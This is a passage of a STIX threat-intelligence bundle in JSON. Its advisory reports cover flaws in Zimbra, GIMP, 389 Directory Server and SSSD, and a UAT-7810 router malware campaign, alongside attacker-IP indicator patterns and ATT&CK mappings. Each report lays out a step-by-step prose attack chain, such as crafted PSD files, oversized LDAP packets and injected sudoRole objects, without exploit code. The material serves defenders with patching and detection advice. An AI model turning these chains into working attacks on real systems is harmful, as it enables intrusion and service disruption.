gains full control over the victim's Zimbra session without needing their credentials. This could lead to unauthorized access to emails, contacts, and other sensitive information. Data theft is also a significant risk, as malicious scripts can exfiltrate sensitive data displayed in the browser. Furthermore, attackers could deface web pages, redirect users to malicious sites, or perform actions on behalf of the victim, potentially leading to further compromise of systems or data. While no specific victim count or targeted sectors are provided, any organization utilizing the Synacor Zimbra Classic Web Client is at risk.\n\n## Recommendation\n\n*   Apply the vendor patch for Synacor Zimbra Classic Web Client immediately once available, as this addresses the root cause of the XSS vulnerability.\n*   Educate users about the risks of phishing and suspicious links, particularly those related to the Zimbra web client, to mitigate the effectiveness of social engineering.\n*   Review web application firewall (WAF) configurations to ensure robust XSS protections are in place, analyzing web server logs for attempts to inject `\u003cscript\u003e` tags or other suspicious characters into URL parameters and form fields.\n",
      "published": "2026-07-07T08:54:47Z",
      "labels": [
        "xss",
        "vulnerability",
        "web-application",
        "zimbra"
      ],
      "object_refs": [
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2216"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f5874cd5-7c70-58bb-91ef-3c802c3b96f1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9c072f16-83f5-5ba8-9061-cf7e546a1d50",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--553c27cf-810b-5c7d-afde-885e1a0821e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9c072f16-83f5-5ba8-9061-cf7e546a1d50",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9c072f16-83f5-5ba8-9061-cf7e546a1d50",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-58384: GIMP PSD Parser Integer Overflow Leads to RCE/DoS",
      "description": "## Overview\n\nCVE-2026-58384 describes a critical flaw in the GIMP (GNU Image Manipulation Program) PSD (Photoshop Document) parser. Specifically, an integer overflow occurs within the `read_RLE_channel()` function. This vulnerability arises when processing specially crafted PSD files, causing an undersized heap allocation for the Run-Length Encoding (RLE) row-length table. Following this incorrect allocation, subsequent per-row writes attempt to use more memory than allocated, leading to heap memory corruption. This memory corruption can have severe consequences, including the application crashing (denial of service) or, in a more advanced scenario, the execution of arbitrary code on the affected system. The vulnerability has a CVSS v3.1 base score of 7.3 (High) and affects GIMP, including its package within Red Hat Enterprise Linux 9.\n\n## Attack Chain\n\n1.  An attacker crafts a malicious PSD file designed to trigger an integer overflow in GIMP's parser.\n2.  The malicious PSD file contains specially formatted RLE channel data intended to cause an undersized buffer allocation.\n3.  A user is enticed to open the malicious PSD file using an affected version of the GIMP application.\n4.  GIMP's `read_RLE_channel()` function begins processing the RLE channel data from the malicious file.\n5.  During the calculation for the RLE row-length table allocation, an integer overflow occurs due to the crafted input.\n6.  This integer overflow results in an undersized heap allocation for the RLE row-length table, creating a buffer overflow condition.\n7.  Subsequent writes by the `read_RLE_channel()` function, intended for per-row data, exceed the boundary of the undersized buffer, corrupting adjacent heap memory.\n8.  This heap memory corruption ultimately leads to either a denial-of-service condition (e.g., GIMP application crash) or, under specific exploit conditions, arbitrary code execution in the context of the user running GIMP.\n\n## Impact\n\nThe impact of CVE-2026-58384 is significant, potentially leading to application instability, data loss, or complete system compromise. If exploited for denial of service, GIMP users would experience application crashes, hindering productivity. More critically, successful exploitation for arbitrary code execution could allow an attacker to run malicious code with the privileges of the compromised user, potentially leading to further compromise of the system, data exfiltration, or installation of additional malware. While no specific victim counts or sectors are mentioned, any organization or individual using affected GIMP versions is at risk.\n\n## Recommendation\n\n*   Update GIMP to a patched version immediately to remediate CVE-2026-58384, as referenced by the `https://gitlab.gnome.org/GNOME/gimp/-/commit/da29e217` commit.\n*   Apply security updates for Red Hat Enterprise Linux 9 if using the GIMP package, addressing CVE-2026-58384, as detailed in the Red Hat advisory `https://access.redhat.com/security/cve/CVE-2026-58384`.\n*   Ensure all software, particularly applications that handle untrusted file formats, are kept up-to-date with the latest security patches.\n",
      "published": "2026-07-07T09:18:26Z",
      "labels": [
        "vulnerability",
        "rce",
        "dos",
        "gimp",
        "linux",
        "heap-overflow"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58384"
        },
        {
          "source_name": "reference",
          "url": "https://access.redhat.com/security/cve/CVE-2026-58384"
        },
        {
          "source_name": "reference",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2497431"
        },
        {
          "source_name": "reference",
          "url": "https://gitlab.gnome.org/GNOME/gimp/-/commit/da29e217"
        },
        {
          "source_name": "reference",
          "url": "https://gitlab.gnome.org/GNOME/gimp/-/issues/16216"
        }
      ],
      "confidence": 80
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--14aa045b-6453-56a8-9b63-0ff6e939fa33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 194.233.92.26",
      "pattern": "[ipv4-addr:value = '194.233.92.26']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T10:03:15Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--91d05443-7278-58f7-9d1e-d228a1f18dd5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "indicator--14aa045b-6453-56a8-9b63-0ff6e939fa33"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--bbc3faf2-a884-5590-87a9-c9755b8af32f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 217.15.160.247",
      "pattern": "[ipv4-addr:value = '217.15.160.247']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T10:03:15Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6d749520-d315-5487-98d2-de3794c99308",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "indicator--bbc3faf2-a884-5590-87a9-c9755b8af32f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--4b0505c6-386f-5bd6-9051-0cb30eb558db",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 217.15.164.147",
      "pattern": "[ipv4-addr:value = '217.15.164.147']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T10:03:15Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--335e8a00-4f58-5205-a0ca-b4a6f4687279",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "indicator--4b0505c6-386f-5bd6-9051-0cb30eb558db"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--0610da4e-becb-51b2-84af-8257bcdb46bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "ip: 95.182.100.231",
      "pattern": "[ipv4-addr:value = '95.182.100.231']",
      "pattern_type": "stix",
      "valid_from": "2026-07-07T10:03:15Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f5b6cbdd-ba41-5618-9250-de4689e91e38",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "indicator--0610da4e-becb-51b2-84af-8257bcdb46bb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2d5e14fb-e9a2-5260-b4bb-e5be8b2f0dd4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--49fe2c1a-ef3e-527c-bf52-ca4a6d283b91",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Ingress Tool Transfer",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1105",
          "url": "https://attack.mitre.org/techniques/T1105"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a36db515-25db-5837-b17f-62604fe476cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--67e5a3f3-bdab-5849-96ea-4884342a9dc0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--36132596-b876-536e-97ac-9a0531c57cc7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Web Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1102",
          "url": "https://attack.mitre.org/techniques/T1102"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--398c9635-7513-5bf1-be23-6de35a5f5cfa",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Obfuscated Files or Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1027",
          "url": "https://attack.mitre.org/techniques/T1027"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--53d4d221-5486-5fb0-94a3-c9e83efe5e08",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2"
    },
    {
      "type": "threat-actor",
      "spec_version": "2.1",
      "id": "threat-actor--87222231-1282-5883-8159-e848a7d65fb6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "UAT-7810"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c609280d-189a-5bb3-8626-90b60f19b866",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "attributed-to",
      "source_ref": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "target_ref": "threat-actor--87222231-1282-5883-8159-e848a7d65fb6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--3fc13160-1c45-59ca-ae5f-98035616ef1a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "UAT-7810 Expands ORB Networks with New Custom Malware: LONGLEASH, DOGLEASH, and JARLEASH",
      "description": "## Overview\n\nCisco Talos has identified that the China-nexus APT actor UAT-7810 continues to evolve its custom malware arsenal and expand its LapDogs Operational Relay Box (ORB) network. Since 2025, UAT-7810 has been observed exploiting N-day vulnerabilities in unpatched Ruckus wireless routers and, more recently in early 2026, ASUS AiCloud routers, to establish persistent footholds. The group has developed new malware families, including LONGLEASH (an advanced version of SHORTLEASH), DOGLEASH (a C-based backdoor for Linux devices), and JARLEASH (a JAVA-based backdoor). These tools enable UAT-7810 to establish robust command and control, proxy traffic, and create a resilient ORB network. This network is then leveraged by secondary China-nexus APT actors, such as UAT-5918, to conduct their own malicious operations against high-value targets, making the affected devices critical infrastructure for broader APT campaigns.\n\n## Attack Chain\n\n1.  **Initial Access**: UAT-7810 exploits known N-day vulnerabilities (CVE-2020-22653, CVE-2020-22658, CVE-2023-25717, CVE-2025-2492) in unpatched Ruckus wireless routers and ASUS AiCloud routers to gain unauthorized access.\n2.  **Execution/Payload Delivery**: A shell script is deployed to the compromised router, acting as an initial dropper or loader.\n3.  **Malware Download**: The shell script downloads secondary malware payloads, such as DOGLEASH, LONGLEASH, or JARLEASH, from attacker-controlled servers (e.g., 194.233.92[.]26, 217.15.160[.]247, 217.15.164[.]147, 95.182.100[.]231).\n4.  **Persistence/Network Configuration**: The shell script adds `iptables` rules to the compromised Linux-based device, allowing TCP traffic to a specific hardcoded port where DOGLEASH binds and listens for commands.\n5.  **Execution**: DOGLEASH (a C-based ELF binary) is executed on the device, binding to its designated port. LONGLEASH (MIPS, ARM, x64 variants) or JARLEASH (JAVA-based) are also executed depending on the target architecture and operational needs.\n6.  **Command and Control (C2)**: DOGLEASH listens for incoming TCP data, decodes it, and executes arbitrary shellcode. LONGLEASH, named \"ff-agent\" internally, establishes reverse shells, HTTP, DNS, SOCKS, TCP, ICMP, and UDP proxy servers, and can act as an intermediate C2 server, forwarding commands. JARLEASH provides file management, FTP, SFTP, and Netcat capabilities.\n7.  **Network Establishment**: The compromised router becomes part of the LapDogs Operational Relay Box (ORB) network, providing resilient and covert infrastructure for command and control.\n8.  **Impact Operations**: The established ORB network is subsequently leveraged by associated secondary threat actors to conduct their own malicious attacks, potentially involving data exfiltration, further lateral movement, or other objectives against high-value targets.\n\n## Impact\n\nThe primary impact of UAT-7810's activities is the establishment and expansion of the LapDogs Operational Relay Box (ORB) network, which serves as critical infrastructure for other China-nexus APTs. Compromised routers, specifically Ruckus wireless and ASUS AiCloud devices, are transformed into C2 nodes and traffic relays, providing anonymity and resilience for subsequent attacks. This infrastructure facilitates a wide range of malicious operations against high-value targets, including government entities, critical infrastructure, and other sensitive organizations, potentially leading to widespread data breaches, espionage, and disruption. The exact number of victims is not specified, but the continuous development of sophisticated custom malware and active exploitation of N-day vulnerabilities indicate a significant, ongoing threat aimed at enabling broad-scale APT operations.\n\n## Recommendation\n\n*   Immediately patch all Ruckus wireless routers and ASUS AiCloud routers against CVE-2020-22653, CVE-2020-22658, CVE-2023-25717, and CVE-2025-2492 to mitigate initial access vectors.\n*   Block inbound and outbound connections to the observed C2/payload distribution IP addresses 194.233.92[.]26, 217.15.160[.]247, 217.15.164[.]147, and 95.182.100[.]231 at the network perimeter.\n*   Deploy the Sigma rule \"Detect Suspicious Iptables Rule Modifications for DOGLEASH\" to your SIEM to identify `iptables` modifications indicative of DOGLEASH deployment on Linux-based network devices.\n*   Enable comprehensive logging for process creation and command execution on all Linux-based networking devices, specifically focusing on `iptables` commands.\n",
      "published": "2026-07-07T10:03:15Z",
      "labels": [
        "apt",
        "malware",
        "backdoor",
        "orb-network",
        "router-exploitation",
        "china-nexus",
        "linux",
        "embedded"
      ],
      "object_refs": [
        "indicator--14aa045b-6453-56a8-9b63-0ff6e939fa33",
        "indicator--bbc3faf2-a884-5590-87a9-c9755b8af32f",
        "indicator--4b0505c6-386f-5bd6-9051-0cb30eb558db",
        "indicator--0610da4e-becb-51b2-84af-8257bcdb46bb",
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--942c509a-a6cb-5ec1-bdbc-488dbadf021d",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--244e0bc7-bed3-5485-8c2d-a9f992f55426",
        "attack-pattern--050d5077-442b-5efa-b26f-551a73b52fb2",
        "threat-actor--87222231-1282-5883-8159-e848a7d65fb6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://blog.talosintelligence.com/uat-7810/"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-22653"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-22658"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25717"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2492"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1078",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a010ab45-8380-57c7-8ed8-526c47795c22",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c7eee2c7-3d4f-5457-9abb-dfbbc39be7b5",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c7eee2c7-3d4f-5457-9abb-dfbbc39be7b5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-11610: 389 Directory Server SASL Heap Buffer Overflow Leading to DoS",
      "description": "## Overview\n\nA critical heap buffer overflow vulnerability, identified as CVE-2026-11610, has been discovered in the SASL I/O layer of 389 Directory Server (389-ds-base). This flaw allows an authenticated attacker to trigger a denial of service by sending a specially crafted, oversized LDAP UNBIND packet after successfully performing a SASL bind with integrity protection (SSF \u003e 0). The vulnerability stems from a lack of bounds checking when copying the packet into a 512-byte heap receive buffer, permitting an overflow of approximately 2 megabytes of attacker-controlled data, which causes the server to crash. This vulnerability has existed since 389-ds-base version 1.3.2, approximately 2013, making many older deployments susceptible. In FreeIPA and Red Hat Identity Management environments, any domain user with a valid Kerberos ticket, enrolled host, or service account can leverage this over the network after authenticating via GSSAPI, posing a significant threat to critical identity services.\n\n## Attack Chain\n\n1.  **Initial Access / Authentication**: An attacker obtains valid credentials or a Kerberos ticket for a domain user, enrolled host, or service account within a FreeIPA or Red Hat Identity Management environment.\n2.  **SASL Bind**: The authenticated attacker successfully performs a SASL bind to the 389 Directory Server, ensuring integrity protection (SSF \u003e 0) is established. This could involve GSSAPI authentication.\n3.  **Craft Malicious Packet**: The attacker crafts an LDAP UNBIND packet with an intentionally oversized payload.\n4.  **Send Malicious Packet**: The attacker sends the specially crafted, oversized LDAP UNBIND packet over the network to the vulnerable 389 Directory Server.\n5.  **Heap Buffer Overflow**: The `sasl_io_recv()` function in `sasl_io.c` processes the oversized packet, attempting to copy it into a 512-byte heap receive buffer without performing adequate bounds checks.\n6.  **Memory Corruption**: The lack of bounds checking allows approximately 2 megabytes of attacker-controlled data to overflow the small buffer, corrupting adjacent memory.\n7.  **Denial of Service**: The memory corruption leads to an unhandled exception or critical error, causing the 389 Directory Server process to crash unexpectedly.\n8.  **Service Interruption**: The 389 Directory Server becomes unavailable, leading to a denial of service for all dependent services, such as authentication and directory lookups in FreeIPA or Red Hat Identity Management deployments.\n\n## Impact\n\nThe successful exploitation of CVE-2026-11610 results in a critical denial of service, causing the 389 Directory Server to crash and become unavailable. This directly impacts core identity management services, such as those provided by FreeIPA and Red Hat Identity Management deployments. A crashed directory server can disrupt user authentication, application access, and directory lookups across an entire organization, leading to widespread operational paralysis. This vulnerability can be triggered by any authenticated user or service account, making it a significant internal threat vector with a CVSS score of 8.8, indicating high severity.\n\n## Recommendation\n\n*   Patch CVE-2026-11610 on all affected 389 Directory Server instances (specifically 389-ds-base versions \u003e= 1.3.2) immediately to prevent denial of service.\n*   Monitor 389 Directory Server system logs for unexpected process terminations or crashes, which could indicate exploitation of CVE-2026-11610 or other issues.\n*   Implement robust network segmentation and access controls to limit network exposure of 389 Directory Server instances, reducing the attack surface for authenticated users.\n",
      "published": "2026-07-07T10:17:48Z",
      "labels": [
        "heap-overflow",
        "denial-of-service",
        "ldap",
        "sasl",
        "linux",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-11610"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e1e06f66-dd8a-59f0-9257-29f315c24879",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a8a0eb01-dfc1-5bbe-8259-1e93e6d8c7f0",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Abuse Elevation Control Mechanism",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1548",
          "url": "https://attack.mitre.org/techniques/T1548"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a22538e9-8883-576c-9817-2174851f69fd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--a8a0eb01-dfc1-5bbe-8259-1e93e6d8c7f0",
      "target_ref": "attack-pattern--2b9dc711-e202-51c6-9b7d-de4286c4d846"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--a8a0eb01-dfc1-5bbe-8259-1e93e6d8c7f0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2026-14474 - SSSD LDAP sudo Provider Privilege Escalation",
      "description": "## Overview\n\nCVE-2026-14474 details a critical flaw within the SSSD (System Security Services Daemon) LDAP sudo provider, identified as having a CVSS v3.1 base score of 8.8. This vulnerability affects Linux systems where SSSD is used to manage sudo privileges via an LDAP directory, specifically when the `ldap_sudo_search_base` option is not explicitly defined in the SSSD configuration. In such a scenario, SSSD defaults to searching the entire LDAP directory tree for `sudoRole` objects. An authenticated attacker who possesses write access to *any* subtree within the LDAP directory can exploit this behavior. By injecting a specially crafted `sudoRole` object into their writable subtree, the attacker can grant themselves or other controlled accounts root-level sudo privileges on all SSSD-enrolled hosts that retrieve and process these LDAP sudo rules, leading to complete system compromise. This highlights the importance of explicit configuration and proper access controls within LDAP environments integrated with SSSD.\n\n## Attack Chain\n\n1.  An authenticated attacker gains access to a user account within the target LDAP environment.\n2.  The attacker identifies that SSSD on target Linux hosts is configured to use the LDAP sudo provider without explicitly setting the `ldap_sudo_search_base` option.\n3.  The attacker leverages their authenticated access to confirm write permissions to *any* subtree within the LDAP directory, even if it is not the intended or traditional `sudoRole` search base.\n4.  The attacker creates and injects a new, malicious `sudoRole` object into the writable LDAP subtree. This object is crafted to grant root-level sudo privileges (e.g., `ALL=(ALL:ALL) ALL`) to a user or group controlled by the attacker.\n5.  When a user attempts to execute a command with `sudo` on an SSSD-enrolled host, SSSD queries the LDAP server for `sudoRole` objects across the entire directory tree due to the missing `ldap_sudo_search_base` configuration.\n6.  SSSD discovers the attacker's injected `sudoRole` object during its broad LDAP search and interprets it as a legitimate sudo rule.\n7.  SSSD processes the malicious `sudoRole`, effectively granting the specified attacker-controlled user or group root-level sudo privileges.\n8.  The attacker can now execute arbitrary commands with `sudo` as the root user on any SSSD-enrolled Linux host configured with the vulnerable setup, achieving full system compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-14474 results in immediate root-level privilege escalation on all affected Linux hosts configured to use the vulnerable SSSD LDAP sudo provider. This allows the attacker to fully compromise the integrity, confidentiality, and availability of the affected systems. An attacker can exfiltrate sensitive data, install backdoors, deploy malware (e.g., ransomware), or disrupt critical services. The broad scope of `sudoRole` application means a single malicious injection can affect numerous machines across an enterprise, leading to widespread organizational impact and potential regulatory violations.\n\n## Recommendation\n\n*   Immediately update SSSD to the patched version once available to address CVE-2026-14474.\n*   Explicitly configure the `ldap_sudo_search_base` option in your SSSD configuration files (`/etc/sssd/sssd.conf`) on all Linux hosts. Define a specific, secure base DN where `sudoRole` objects are expected, rather than allowing SSSD to search the entire LDAP tree.\n*   Review and restrict write access permissions to all LDAP directory subtrees, ensuring only authorized administrators can modify entries relevant to `sudoRole` objects.\n*   Regularly audit your LDAP directory for unauthorized or suspicious `sudoRole` objects that may have been injected.\n*   Monitor `sudo` logs 